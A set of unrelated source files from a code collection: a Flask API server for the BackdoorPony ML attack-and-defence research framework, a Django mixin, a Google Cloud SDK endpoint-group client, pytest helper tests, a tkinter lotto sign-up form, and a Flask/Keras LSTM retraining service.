result=[], recursive=True, req_module=None, req_attr = ['__name__', '__category__', '__input_type__', '__info__', '__link__'])\n return jsonify(defences)\n\n\n@app.route('/get_stored_attack_name', methods=['GET'])\ndef get_stored_attack_name():\n '''Returns the stored attack name.'''\n return app_tracker.attack_name\n\n\n@app.route('/get_stored_defence_name', methods=['GET'])\ndef get_stored_defence_name():\n '''Returns the stored defence name.'''\n return app_tracker.defence_name\n\n\n@app.route('/get_stored_attack_category', methods=['GET'])\ndef get_stored_attack_category():\n '''Returns the stored attack category.'''\n return app_tracker.attack_category\n\n\n@app.route('/get_stored_defence_category', methods=['GET'])\ndef get_stored_defence_category():\n '''Returns the stored defence category.'''\n return app_tracker.defence_category\n\n\n# Params ---------------------------------------------------------------\n\n@app.route('/get_default_model_params', methods=['POST'])\ndef get_default_model_params():\n '''Returns a list of all the default model parameters in JSON format.'''\n dataset_name = request.form['modelName']\n model_name = dataset_to_model[dataset_name]\n _, default_params = import_submodules_attributes(package=backdoorpony.models, result=[\n ], recursive=True, req_module=model_name, req_attr=['__category__', '__defaults__'], debug=False)\n return jsonify(default_params)\n\n\n@app.route('/get_default_attack_params', methods=['POST'])\ndef get_default_attack_params():\n '''Returns a list of all the default attack parameters in JSON format.'''\n attack_name = request.form['attackName'].lower()\n app_tracker.attack_name = attack_name\n _, default_params = import_submodules_attributes(package=backdoorpony.attacks, result=[\n ], recursive=True, req_module=attack_name, req_attr=['__category__', '__defaults_form__', '__defaults_dropdown__', '__defaults_range__'])\n\n return jsonify(default_params)\n\n\n@app.route('/get_default_defence_params', methods=['POST'])\ndef get_default_defence_params():\n '''Returns a list of all the default defence parameters in JSON format.'''\n defence_name = request.form['defenceName'].lower()\n _, default_params = import_submodules_attributes(package=backdoorpony.defences, result=[\n ], recursive=True, req_module=defence_name, req_attr = ['__category__', '__defaults_form__', '__defaults_dropdown__', '__defaults_range__'])\n return jsonify(default_params)\n\n\n@app.route('/get_stored_attack_params', methods=['GET'])\ndef get_stored_attack_params():\n '''Returns the dictionary storing attack parameters in JSON format.'''\n return jsonify(app_tracker.attack_params_combined)\n\n\n@app.route('/get_stored_defence_params', methods=['GET'])\ndef get_stored_defence_params():\n '''Returns the dictionary storing defence parameters in JSON format.'''\n return jsonify(app_tracker.defence_params_combined)\n\n# Execute ------------------------------------------------------------\n@app.route('/execute', methods=['POST'])\n@cross_origin()\ndef execute():\n '''Executes the selected attack and/or defence with their corresponding parameters\n If attackName is not in the form, no attack will be executed.\n If defenceName is not in the form, no defence will be executed.\n\n in form:\n attackName\n defenceName\n attackParams\n defenceParams\n attackCategory\n defenceCategory\n '''\n app_tracker.reset_action_info()\n clean_classifier = app_tracker.model_loader.get_classifier()\n test_data = app_tracker.model_loader.get_test_data()\n if hasattr(app_tracker.model_loader, 
'audio'):\n test_data = app_tracker.model_loader.audio_test_data\n execution_history = {}\n\n if 'attackName' in request.form:\n print(request.form)\n app_tracker.attack_name = request.form['attackName']\n app_tracker.attack_category = request.form['attackCategory']\n app_tracker.attack_params_form = json.loads(request.form['attackParamsForm'].replace(\"'\", '\"'))\n app_tracker.attack_params_dropdown = json.loads(request.form['attackParamsDropdown'].replace(\"'\", '\"'))\n app_tracker.attack_params_range = json.loads(request.form['attackParamsRange'].replace(\"'\", '\"'))\n app_tracker.attack_params_combined = {**app_tracker.attack_params_form, **app_tracker.attack_params_dropdown, \n **app_tracker.attack_params_range}\n train_data = app_tracker.model_loader.get_train_data()\n if hasattr(app_tracker.model_loader, 'audio'):\n train_data = app_tracker.model_loader.audio_train_data\n execution_history = app_tracker.action_runner.run_attack(clean_classifier=clean_classifier,\n train_data=train_data,\n test_data=test_data,\n execution_history=execution_history,\n attack_to_run=app_tracker.attack_name,\n attack_params=app_tracker.attack_params_combined)\n\n if hasattr(app_tracker.model_loader, 'audio'):\n test_data = app_tracker.model_loader.get_test_data()\n if 'defenceName' in request.form:\n app_tracker.defence_name = request.form['defenceName']\n app_tracker.defence_category = request.form['defenceCategory']\n app_tracker.defence_params_form = json.loads(request.form['defenceParamsForm'].replace(\"'\", '\"'))\n app_tracker.defence_params_dropdown = json.loads(request.form['defenceParamsDropdown'].replace(\"'\", '\"'))\n app_tracker.defence_params_range = json.loads(request.form['defenceParamsRange'].replace(\"'\", '\"'))\n app_tracker.defence_params_combined = {**app_tracker.defence_params_form, **app_tracker.defence_params_dropdown, \n **app_tracker.defence_params_range}\n execution_history = app_tracker.action_runner.run_defence(clean_classifier=clean_classifier,\n test_data=test_data,\n execution_history=execution_history,\n defence_to_run=app_tracker.defence_name,\n defence_params=app_tracker.defence_params_combined)\n\n\n app_tracker.main_metrics_runner.instantiate(clean_classifier=clean_classifier,\n execution_history=execution_history,\n benign_inputs=test_data,\n requests={})\n\n return jsonify('Execution of attack and/or defence was successful.')\n\n\n\n# Metrics -------------------------------------------------------------\n\n@app.route('/get_metrics_info', methods=['GET'])\n@cross_origin()\ndef get_metrics_info():\n '''Gets metrics available for the category of attack and or defence saved in the app_tracker\n Returns a dictionary with the following shape:\n {\n #for attack only\n : {\n name: ,\n pretty_name: ,\n info: ,\n is_attack_metric: True\n },\n #for defence only\n : {\n name: ,\n pretty_name: ,\n info: ,\n is_defence_metric: True\n },\n #for both attack and defence\n : {\n name: ,\n pretty_name: ,\n info: ,\n is_attack_metric: True/False,\n is_defence_metric: True/False\n }\n }\n '''\n _, metrics_info = import_submodules_attributes(package=backdoorpony.metrics, result=[], recursive=True, req_module=None, req_attr = ['__category__', '__info__'])\n\n available_metrics = {}\n\n if app_tracker.attack_category:\n for info in metrics_info:\n if info['category'] == app_tracker.attack_category:\n attack_metrics_info = info\n break\n for key, val in attack_metrics_info['info'].items():\n new_val = available_metrics.get(key, copy.deepcopy(val))\n new_val.update({'is_attack_metric': 
True, 'name': key})\n available_metrics.update({key: new_val})\n\n if app_tracker.defence_category:\n for info in metrics_info:\n if info['category'] == app_tracker.defence_category:\n defence_metrics_info = info\n break\n for key, val in defence_metrics_info['info'].items():\n new_val = available_metrics.get(key, copy.deepcopy(val))\n new_val.update({'is_defence_metric': True, 'name': key})\n available_metrics.update({key: new_val})\n\n return jsonify(available_metrics)\n\n\n@app.route('/get_metrics_results', methods=['POST'])\ndef get_metrics_results():\n '''Calculates the metrics in the request and returns in graph-compatible format\n '''\n request_metrics = json.loads(request.form['request'].replace(\"'\", '\"'))\n\n app_tracker.main_metrics_runner.update(requests=request_metrics)\n\n return jsonify(app_tracker.main_metrics_runner.get_results())\n\n\n# Configuration ----------------------------------------------------------\n\n@app.route('/get_configuration_file', methods=['GET'])\ndef get_configuration_file():\n '''Sends a file with the details of the executed configuration.\n Returns a dictionary containing values used for attack and/or defence name, category, input_type, parameters.\n '''\n return jsonify(app_tracker.generate_configuration_file())","repo_name":"Rezonansce/backdoorponyv2","sub_path":"server/src/backdoorpony/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":13809,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"73704196353","text":"from .models import Category\r\n\r\nmenu = [{'title': \"Add a new event\", \"url_name\":'add_event'},\r\n {'title': \"Send a new mail\", \"url_name\":'send_mail'} ]\r\n\r\n\r\n\r\nclass DataMixin:\r\n def get_user_context(self,**kwargs):\r\n context = kwargs\r\n cats = Category.objects.all() \r\n user_menu = menu.copy()\r\n if not self.request.user.is_superuser:\r\n user_menu.clear()\r\n context[\"menu\"] = user_menu\r\n context[\"category\"] = cats\r\n if 'cat_selected' not in context:\r\n context['cat_selected'] = 0\r\n return context\r\n ","repo_name":"keyzoz/Django-EventsApp","sub_path":"eventApp/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5286892617","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nfrom googlecloudsdk.api_lib.compute import utils as api_utils\nfrom googlecloudsdk.api_lib.compute.operations import poller\nfrom googlecloudsdk.api_lib.util import waiter\nfrom googlecloudsdk.command_lib.util.apis import arg_utils\n\n\nclass NetworkEndpointGroupsClient(object):\n \"\"\"Client for network endpoint groups service in the GCE API.\"\"\"\n\n def __init__(self, client, messages, resources):\n self.client = client\n self.messages = messages\n self.resources = resources\n self._zonal_service = self.client.apitools_client.networkEndpointGroups\n if hasattr(self.client.apitools_client, 'globalNetworkEndpointGroups'):\n self._global_service = self.client.apitools_client.globalNetworkEndpointGroups\n\n def Create(self, neg_ref, network_endpoint_type, default_port=None,\n network=None, subnet=None):\n \"\"\"Creates a network endpoint group.\"\"\"\n is_zonal = hasattr(neg_ref, 'zone')\n\n network_uri = None\n if network and is_zonal:\n network_ref = self.resources.Parse(network, {'project': neg_ref.project},\n collection='compute.networks')\n 
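# The Compute API expects a full self-link URI here rather than a\n # short resource name.\n 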
network_uri = network_ref.SelfLink()\n subnet_uri = None\n if subnet and is_zonal:\n region = api_utils.ZoneNameToRegionName(neg_ref.zone)\n subnet_ref = self.resources.Parse(\n subnet,\n {'project': neg_ref.project, 'region': region},\n collection='compute.subnetworks')\n subnet_uri = subnet_ref.SelfLink()\n\n endpoint_type_enum = (self.messages.NetworkEndpointGroup\n .NetworkEndpointTypeValueValuesEnum)\n network_endpoint_group = self.messages.NetworkEndpointGroup(\n name=neg_ref.Name(),\n networkEndpointType=arg_utils.ChoiceToEnum(network_endpoint_type,\n endpoint_type_enum),\n defaultPort=default_port,\n network=network_uri,\n subnetwork=subnet_uri)\n\n if is_zonal:\n request = self.messages.ComputeNetworkEndpointGroupsInsertRequest(\n networkEndpointGroup=network_endpoint_group,\n project=neg_ref.project,\n zone=neg_ref.zone)\n return self.client.MakeRequests([(self._zonal_service, 'Insert', request)\n ])[0]\n else:\n request = self.messages.ComputeGlobalNetworkEndpointGroupsInsertRequest(\n networkEndpointGroup=network_endpoint_group, project=neg_ref.project)\n return self.client.MakeRequests([(self._global_service, 'Insert', request)\n ])[0]\n\n def _AttachZonalEndpoints(self, neg_ref, endpoints):\n \"\"\"Attaches network endpoints to a zonal network endpoint group.\"\"\"\n request_class = (\n self.messages.ComputeNetworkEndpointGroupsAttachNetworkEndpointsRequest)\n nested_request_class = (\n self.messages.NetworkEndpointGroupsAttachEndpointsRequest)\n request = request_class(\n networkEndpointGroup=neg_ref.Name(),\n project=neg_ref.project,\n zone=neg_ref.zone,\n networkEndpointGroupsAttachEndpointsRequest=nested_request_class(\n networkEndpoints=self._GetEndpointMessageList(endpoints)))\n return self._zonal_service.AttachNetworkEndpoints(request)\n\n def _DetachZonalEndpoints(self, neg_ref, endpoints):\n \"\"\"Detaches network endpoints from a zonal network endpoint group.\"\"\"\n request_class = (\n self.messages.ComputeNetworkEndpointGroupsDetachNetworkEndpointsRequest)\n nested_request_class = (\n self.messages.NetworkEndpointGroupsDetachEndpointsRequest)\n request = request_class(\n networkEndpointGroup=neg_ref.Name(),\n project=neg_ref.project,\n zone=neg_ref.zone,\n networkEndpointGroupsDetachEndpointsRequest=nested_request_class(\n networkEndpoints=self._GetEndpointMessageList(endpoints)))\n return self._zonal_service.DetachNetworkEndpoints(request)\n\n def _AttachGlobalEndpoints(self, neg_ref, endpoints):\n \"\"\"Attaches network endpoints to a global network endpoint group.\"\"\"\n request_class = (\n self.messages\n .ComputeGlobalNetworkEndpointGroupsAttachNetworkEndpointsRequest)\n nested_request_class = (\n self.messages.GlobalNetworkEndpointGroupsAttachEndpointsRequest)\n request = request_class(\n networkEndpointGroup=neg_ref.Name(),\n project=neg_ref.project,\n globalNetworkEndpointGroupsAttachEndpointsRequest=nested_request_class(\n networkEndpoints=self._GetEndpointMessageList(endpoints)))\n return self._global_service.AttachNetworkEndpoints(request)\n\n def _DetachGlobalEndpoints(self, neg_ref, endpoints):\n \"\"\"Detaches network endpoints from a global network endpoint group.\"\"\"\n request_class = (\n self.messages\n .ComputeGlobalNetworkEndpointGroupsDetachNetworkEndpointsRequest)\n nested_request_class = (\n self.messages.GlobalNetworkEndpointGroupsDetachEndpointsRequest)\n request = request_class(\n networkEndpointGroup=neg_ref.Name(),\n project=neg_ref.project,\n globalNetworkEndpointGroupsDetachEndpointsRequest=nested_request_class(\n 
networkEndpoints=self._GetEndpointMessageList(endpoints)))\n return self._global_service.DetachNetworkEndpoints(request)\n\n def _GetEndpointMessageList(self, endpoints):\n \"\"\"Convert endpoints to a list which can be passed in a request.\"\"\"\n output_list = []\n for arg_endpoint in endpoints:\n message_endpoint = self.messages.NetworkEndpoint()\n if 'instance' in arg_endpoint:\n message_endpoint.instance = arg_endpoint.get('instance')\n if 'ip' in arg_endpoint:\n message_endpoint.ipAddress = arg_endpoint.get('ip')\n if 'port' in arg_endpoint:\n message_endpoint.port = arg_endpoint.get('port')\n if 'fqdn' in arg_endpoint:\n message_endpoint.fqdn = arg_endpoint.get('fqdn')\n output_list.append(message_endpoint)\n\n return output_list\n\n def _GetOperationsRef(self, operation):\n return self.resources.Parse(operation.selfLink,\n collection='compute.zoneOperations')\n\n def _GetGlobalOperationsRef(self, operation):\n return self.resources.Parse(\n operation.selfLink, collection='compute.globalOperations')\n\n def _WaitForResult(self, operation_poller, operation_ref, message):\n if operation_ref:\n return waiter.WaitFor(operation_poller, operation_ref, message)\n return None\n\n def Update(self, neg_ref, add_endpoints=None, remove_endpoints=None):\n \"\"\"Updates a Compute Network Endpoint Group.\"\"\"\n attach_endpoints_ref = None\n detach_endpoints_ref = None\n operation_poller = None\n\n if hasattr(neg_ref, 'zone'):\n operation_poller = poller.Poller(self._zonal_service)\n if add_endpoints:\n operation = self._AttachZonalEndpoints(neg_ref, add_endpoints)\n attach_endpoints_ref = self._GetOperationsRef(operation)\n if remove_endpoints:\n operation = self._DetachZonalEndpoints(neg_ref, remove_endpoints)\n detach_endpoints_ref = self._GetOperationsRef(operation)\n else:\n operation_poller = poller.Poller(self._global_service)\n if add_endpoints:\n operation = self._AttachGlobalEndpoints(neg_ref, add_endpoints)\n attach_endpoints_ref = self._GetGlobalOperationsRef(operation)\n if remove_endpoints:\n operation = self._DetachGlobalEndpoints(neg_ref, remove_endpoints)\n detach_endpoints_ref = self._GetGlobalOperationsRef(operation)\n\n neg_name = neg_ref.Name()\n result = None\n result = self._WaitForResult(\n operation_poller, attach_endpoints_ref,\n 'Attaching {0} endpoints to [{1}].'.format(\n len(add_endpoints) if add_endpoints else 0, neg_name)) or result\n result = self._WaitForResult(\n operation_poller, detach_endpoints_ref,\n 'Detaching {0} endpoints from [{1}].'.format(\n len(remove_endpoints) if remove_endpoints else 0, neg_name)\n ) or result\n\n return result\n","repo_name":"egzonarexhepi/mathpixlatexconverter","sub_path":"frontend/matt12345/google-cloud-sdk/lib/googlecloudsdk/api_lib/compute/network_endpoint_groups.py","file_name":"network_endpoint_groups.py","file_ext":"py","file_size_in_byte":8073,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"4303721835","text":"\"\"\"Test the leica helper functions.\"\"\"\nfrom pathlib import PureWindowsPath\n\nfrom camacq.plugins.leica.helper import find_image_path, get_field, get_imgs, get_well\n\nfrom tests.common import FIELD_PATH, IMAGE_PATH, WELL_PATH\n\n\ndef test_find_image_path():\n \"\"\"Test find image path.\"\"\"\n parts = IMAGE_PATH.parts\n root = parts[0]\n relpath = parts[1:]\n windows_path = PureWindowsPath(\"\")\n relpath = windows_path.joinpath(*relpath)\n\n path = find_image_path(str(relpath), root)\n\n assert path == str(IMAGE_PATH)\n\n\ndef 
test_get_field():\n    \"\"\"Test get field.\"\"\"\n    path = get_field(IMAGE_PATH)\n\n    assert path == str(IMAGE_PATH.parent)\n\n\ndef test_get_well():\n    \"\"\"Test get well.\"\"\"\n    path = get_well(IMAGE_PATH)\n\n    assert path == str(WELL_PATH)\n\n\ndef test_get_imgs():\n    \"\"\"Test get imgs.\"\"\"\n    images = get_imgs(str(WELL_PATH), search=\"C31\")\n\n    assert len(images) == 6\n\n    images = get_imgs(str(FIELD_PATH), search=\"C22\")\n\n    assert len(images) == 3\n","repo_name":"CellProfiling/cam_acq","sub_path":"tests/plugins/leica/test_helper.py","file_name":"test_helper.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"16550086709","text":"from tkinter import *\nimport rsaidnumber\nfrom datetime import datetime, timedelta\nfrom tkinter import messagebox\nfrom email_validator import validate_email, EmailNotValidError\n\nmaster = Tk()\nmaster.geometry(\"600x500\")\nmaster.config(bg=\"#111\")\n\ncanvas = Canvas(master, width=300, height=100)\ncanvas.place(x=150, y=10)\nimg = PhotoImage(file=\"img_1.png\")\ncanvas.create_image(0, 0, anchor=NW, image=img)\n\nname_lab = Label(master, text=\"Enter name:\", bg=\"#111\", fg=\"gold\", font=15)\nname_lab.place(x=100, y=150)\n\nname_ent = Entry(master)\nname_ent.place(x=300, y=150)\n\nemail_lab = Label(master, text=\"Enter email address:\", bg=\"#111\", fg=\"gold\", font=15)\nemail_lab.place(x=100, y=200)\n\nemail_ent = Entry(master)\nemail_ent.place(x=300, y=200)\n\nid_num_lab = Label(master, text=\"Enter ID number:\", bg=\"#111\", fg=\"gold\", font=15)\nid_num_lab.place(x=100, y=250)\n\nid_num_ent = Entry(master)\nid_num_ent.place(x=300, y=250)\n\naddress_lab = Label(master, text=\"Enter address:\", bg=\"#111\", fg=\"gold\", font=15)\naddress_lab.place(x=100, y=300)\n\naddress_ent = Entry(master)\naddress_ent.place(x=300, y=300)\n\n\ndef sub():\n    # adding contents to a text file\n    text = \"\"\n    my_file = open(\"Text_file.txt\", 'a')\n    text += \"Username: \" + name_ent.get()\n    text += '\\n'\n    text += \"Email: \" + email_ent.get()\n    text += '\\n'\n    text += \"Address: \" + address_ent.get()\n    text += '\\n'\n    text += \"ID number: \" + id_num_ent.get()\n    text += '\\n'\n    my_file.write(text)\n    my_file.close()\n\n    # verifying id number and checking age\n    id_num = rsaidnumber.parse(id_num_ent.get())\n    age = ((datetime.today() - id_num.date_of_birth) // timedelta(days=365.25))\n    if age >= 18:\n        messagebox.showinfo(\"Success\", \"Let's Play\")\n    else:\n        years_left = 18 - age\n        messagebox.showinfo(\"Error\", \"Return in\" + '\\n' + str(years_left) + \" years time\")\n\n    # checking if email is valid\n    try:\n        validate_email(email_ent.get())\n\n    except EmailNotValidError:\n        # email is not valid\n        messagebox.showinfo(\"Error\", \"Invalid Email. 
Try again\")\n        return  # an invalid email must not fall through to opening the game window\n\n    master.destroy()\n    import Random_window\n\n\nsub_btn = Button(master, text=\"Submit\", width=10, height=2, bg=\"#111\", fg=\"gold\", font=15, command=sub)\nsub_btn.place(x=230, y=350)\n\n\nmaster.mainloop()\n","repo_name":"Zaid070902/Lotto_Project","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"75092072194","text":"from flask import Flask, render_template, jsonify, request, session, redirect, url_for, flash\nfrom flask_wtf import FlaskForm\nfrom flask_cors import CORS\nfrom flask_bootstrap import Bootstrap\nfrom wtforms import StringField, SubmitField\nfrom wtforms.validators import Required\n\nfrom keras.models import load_model, Sequential\nfrom keras.layers import Dense, Flatten, LSTM, Conv1D, MaxPooling1D, Dropout, Activation\nfrom keras.layers.embeddings import Embedding\nfrom keras.preprocessing.text import Tokenizer\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.wrappers.scikit_learn import KerasClassifier\nfrom keras import backend as K\nimport tensorflow as tf\n\napp = Flask(__name__,template_folder='flask_templates')\nBootstrap(app)\nCORS(app)\n\nfrom sklearn.model_selection import train_test_split\nimport pandas as pd\n\nfrom io import StringIO\nimport nltk\nimport string\nimport os\nimport glob\nimport json\nimport datetime\nfrom nltk.corpus import stopwords\nfrom nltk.stem import SnowballStemmer\nimport re\nimport pickle\nimport shutil\n\ntokenizer = None\nlstm_model = None\nmax_length = 100\ngraph = None\nmodel_version = None\n\napp.config['SECRET_KEY'] = 'hard to guess string'\n\ndef clean_text(text):\n    if text is None:\n        return \"\"\n    elif isinstance(text,float):\n        if str(text) == 'nan':\n            #print('nan')\n            return \"\"\n\n    ## Remove punctuation\n    text = text.translate(str.maketrans('', '', string.punctuation))\n\n    ## Convert words to lower case and split them\n    text = text.lower().split()\n\n    ## Remove stop words\n    stops = set(stopwords.words(\"english\"))\n    text = [w for w in text if not w in stops and len(w) >= 3]\n\n    text = \" \".join(text)\n\n    # Clean the text\n    text = re.sub(r\"[^A-Za-z0-9^,!.\\/'+-=]\", \" \", text)\n    text = re.sub(r\"\\s{2,}\", \" \", text)\n\n    text = text.split()\n    stemmer = SnowballStemmer('english')\n    stemmed_words = [stemmer.stem(word) for word in text]\n    text = \" \".join(stemmed_words)\n\n    #print(text)\n    return text\n\ndef get_lstm_model_function(vocabulary_size):\n\n    def create_lstm_model(optimizer='adam'):\n        model_lstm = Sequential()\n        model_lstm.add(Embedding(vocabulary_size, 100, input_length=max_length))\n        model_lstm.add(LSTM(100, dropout=0.2, recurrent_dropout=0.2))\n        model_lstm.add(Dense(1, activation='sigmoid'))\n        model_lstm.compile(loss='binary_crossentropy', optimizer=optimizer, metrics=['accuracy'])\n        return model_lstm\n\n    return create_lstm_model\n\ndef formatDataframe(df):\n    df = df.fillna('')  # fillna returns a new DataFrame, so the result has to be kept\n    print(df[:100])\n    df['combined_text'] = df.apply(lambda x: x.OtherSx2, axis=1)\n    df['combined_text_clean'] = df['combined_text'].map(lambda x : clean_text(x))\n    return df\n\n@app.route('/trainingCSVHeaders', methods=['GET'])\ndef getTrainingCSVHeaders():\n    responses = jsonify({\"headers\":\"examDescription,OtherHx,OtherSx,OtherSx2,indicationDescription,label_binary\"})\n    responses.status_code = 200\n    return responses\n
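\n# A minimal usage sketch (assumed, not from the original repo): with the server running\n# on port 8484 as configured in app.run at the bottom of this file, a saved model folder\n# could be loaded like this -- the folder name is purely illustrative:\n#\n#   import requests\n#   requests.post('http://localhost:8484/load_model', json={'model_version': '2020-01-01_00:00:00_data'})\n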
@app.route('/load_model', methods=['POST'])\ndef loadModel():\n    global lstm_model, tokenizer, graph, model_version\n    modeldata_json = request.get_json()\n    files = glob.glob('data/*_data')\n\n    if modeldata_json['model_version'] in map(lambda x: x.replace('data/',''),files):\n        try:\n            print(\"Loading Pickle : data/\" + modeldata_json['model_version'] + \"/\" + modeldata_json['model_version'] + \"_tokenizer_combined.pickle\")\n            with open('data/' + modeldata_json['model_version'] + '/' + modeldata_json['model_version'] + '_tokenizer_combined.pickle', 'rb') as handle:\n                tokenizer = pickle.load(handle)\n                print(tokenizer)\n        except Exception as e:\n            print('Could not open tokenizer')\n            print(e)\n            responses = jsonify({\"message\":\"load error (tokenizer), please contact admin.\"})\n            responses.status_code = 500\n            return responses\n        K.clear_session()\n        graph = tf.get_default_graph()\n        try:\n            print(\"Loading LSTM Model : data/\" + modeldata_json['model_version'] + \"/\" + modeldata_json['model_version'] + \"_combined.h5\")\n            lstm_model = load_model('data/' + modeldata_json['model_version'] + '/' + modeldata_json['model_version'] + '_combined.h5')\n            #update model_version\n            model_version = \"ml_postproc_lstm_\" + modeldata_json['model_version']\n        except Exception as e:\n            print('Could not open lstm_model')\n            print(e)\n            responses = jsonify({\"message\":\"load error (lstm_model), please contact admin.\"})\n            responses.status_code = 500\n            return responses\n\n        responses = jsonify({\"message\":\"loading of model: \" + model_version + \" complete.\"})\n        responses.status_code = 200\n        return responses\n\n    else:\n        responses = jsonify({\"message\": modeldata_json['model_version'] + \" not found.\"})\n        responses.status_code = 500\n        return responses\n\n@app.route('/model_version', methods=['GET'])\ndef getModelVersion():\n    global model_version\n    responses = jsonify({\"message\":model_version})\n    responses.status_code = 200\n    return responses\n\n@app.route('/undo_retrain', methods=['POST'])\ndef undoRetrain():\n    global tokenizer, graph, lstm_model, model_version\n    K.clear_session()\n\n    files = glob.glob('data/*_data')\n    files.sort(reverse=True)\n    responses = None\n\n    if len(files) == 0:\n        responses = jsonify({\"message\":\"no models available to undo. model_version remains: \" + model_version})\n        responses.status_code = 500\n        return responses\n\n    if len(files) == 1:\n        shutil.rmtree(files[0])\n        responses = jsonify({\"message\":\"undo complete. model_version remains: \" + model_version})\n        responses.status_code = 200\n        return responses\n\n    try:\n        print(\"Loading Pickle : \" + files[1] + \"/\" + files[1].replace('data/','') + \"_tokenizer_combined.pickle\")\n        with open(files[1] + '/' + files[1].replace('data/','') + '_tokenizer_combined.pickle', 'rb') as handle:\n            tokenizer = pickle.load(handle)\n            print(tokenizer)\n    except Exception as e:\n        print('Could not open tokenizer')\n        print(e)\n        responses = jsonify({\"message\":\"undo error (tokenizer), please contact admin.\"})\n        responses.status_code = 500\n        return responses\n    graph = tf.get_default_graph()\n    try:\n        print(\"Loading LSTM Model : \" + files[1] + \"/\" + files[1].replace('data/','') + \"_combined.h5\")\n        lstm_model = load_model(files[1] + '/' + files[1].replace('data/','') + '_combined.h5')\n        #update model_version\n        model_version = \"ml_postproc_lstm_\" + files[1].replace('data/','')\n    except Exception as e:\n        print('Could not open lstm_model')\n        print(e)\n        responses = jsonify({\"message\":\"undo error (lstm_model), please contact admin.\"})\n        responses.status_code = 500\n        return responses\n\n    try:\n        shutil.rmtree(files[0])\n    except Exception as e:\n        print('Could not delete previous model')\n        print(e)\n        responses = jsonify({\"message\":\"undo error (file removal), please contact admin.\"})\n        responses.status_code = 500\n        return responses\n\n    responses = jsonify({\"message\":\"undo complete. model_version: \" + model_version})\n    responses.status_code = 200\n    return responses\n
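\n# A matching sketch for retraining (assumed usage): the endpoint accepts either a\n# multipart CSV upload under the field name 'data' or a JSON body, e.g.:\n#\n#   import requests\n#   with open('labels.csv', 'rb') as f:  # illustrative file name\n#       requests.post('http://localhost:8484/retrain', files={'data': f})\n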
\n@app.route('/retrain', methods=['POST'])\ndef retrain():\n    global graph, tokenizer, lstm_model, model_version\n    K.clear_session()\n\n    try:\n        csv_data = None\n        json_data = None\n\n        if request.is_json:\n            json_data = json.loads(request.get_json())['data']\n        else:\n            csv_data = request.files['data']\n\n        now_date_folder_name = datetime.datetime.now().strftime(\"%Y-%m-%d_%H:%M:%S\") + \"_data\"\n\n        new_data_df = None\n        previous_data_df = None\n\n        if (not os.path.isdir('data/' + now_date_folder_name)):\n\n            #if 'model' in model_csv_json:\n            os.makedirs('data/' + now_date_folder_name)\n            #print(model_csv_json['model'])\n            #new_data_df = pd.read_json(model_csv_json['data'])\n            if csv_data:\n                #print(csv_data)\n                new_data_df = pd.read_csv(csv_data)\n            else:\n                new_data_df = pd.read_json(json_data)\n\n            new_data_df.to_csv('data/' + now_date_folder_name + \"/\" + now_date_folder_name + \".csv\",index=False)\n            #else:\n            #return getTrainingHeaders()\n\n\n        files = glob.glob('data/*_data')\n        files.sort(reverse=True)\n        print(files)\n\n        #files[0].replace('data/','')\n        if len(files) > 1 and files[0] == 'data/' + now_date_folder_name:\n            print(files[1])\n            previous_data_df = pd.read_csv(files[1] + \"/\" + files[1].replace('data/','') + \"_combined.csv\")\n            new_data_df = pd.concat([new_data_df,previous_data_df])\n\n        new_data_df.to_csv('data/' + now_date_folder_name + \"/\" + now_date_folder_name + \"_combined.csv\",index=False)\n\n        new_data_df = formatDataframe(new_data_df)\n\n        max_length = 100\n        new_tokenizer = Tokenizer()\n        new_tokenizer.fit_on_texts(new_data_df['combined_text_clean'])\n        vocabulary_size = len(new_tokenizer.word_index) + 1\n        sequences = new_tokenizer.texts_to_sequences(new_data_df['combined_text_clean'])\n        lstm_data = pad_sequences(sequences, maxlen=max_length)\n\n        new_lstm_model = KerasClassifier(build_fn=get_lstm_model_function(vocabulary_size), epochs=3, verbose=0)\n        X_train, X_test, y_train, y_test, indices_train, indices_test = train_test_split(lstm_data, new_data_df.label_binary, 
new_data_df.index, test_size=0.10, random_state=0)\n new_lstm_model.fit(X_train, y_train, validation_data=(X_test,y_test), epochs=3)\n\n new_lstm_model.model.save('data/' + now_date_folder_name + '/' + now_date_folder_name + '_combined.h5')\n with open('data/' + now_date_folder_name + '/' + now_date_folder_name + '_tokenizer_combined.pickle','wb') as handle: \n pickle.dump(new_tokenizer,handle,protocol=pickle.HIGHEST_PROTOCOL) \n\n print(\"Re-Loading LSTM Model : data/\" + now_date_folder_name + '/' + now_date_folder_name + \"_combined.h5\")\n lstm_model = load_model('data/' + now_date_folder_name + '/' + now_date_folder_name + '_combined.h5')\n model_version = \"ml_postproc_lstm_\" + now_date_folder_name\n #lstm_model = new_lstm_model\n tokenizer = new_tokenizer\n graph = tf.get_default_graph()\n\n except Exception as e:\n raise e\n responses = jsonify({\"message\":\"retraining complete. model_version: \" + model_version})\n responses.status_code = 200\n return(responses)\n\ndef getPrediction(examDescription=\"\", OtherHX=\"\", OtherSX=\"\", OtherSX2=\"\", indicationDescription=\"\"):\n global lstm_model, tokenizer, max_length, graph, model_version\n #to_classify = examDescription + '. ' + OtherSX + '. ' + indicationDescription\n #to_classify = examDescription + '. ' + OtherHX + '. ' + OtherSX + '. ' + indicationDescription\n to_classify = OtherSX2\n print(to_classify)\n to_classify = clean_text(to_classify)\n to_classify = pad_sequences(tokenizer.texts_to_sequences([to_classify]),maxlen=max_length)\n print(to_classify)\n\n prediction = [[]]\n with graph.as_default():\n prediction = lstm_model.predict(to_classify)\n #prediction = lstm_model.predict_proba(to_classify)\n #prediction = 1.0 - float(prediction[0][0])\n prediction = prediction[0][0]\n print(prediction)\n #return(str(1.0-prediction[0][0]))\n return(str(prediction))\n\n@app.route('/predict', methods=['POST'])\ndef predict():\n try:\n orderdata_json = request.get_json()\n print(orderdata_json)\n except Exception as e:\n raise e\n prediction = 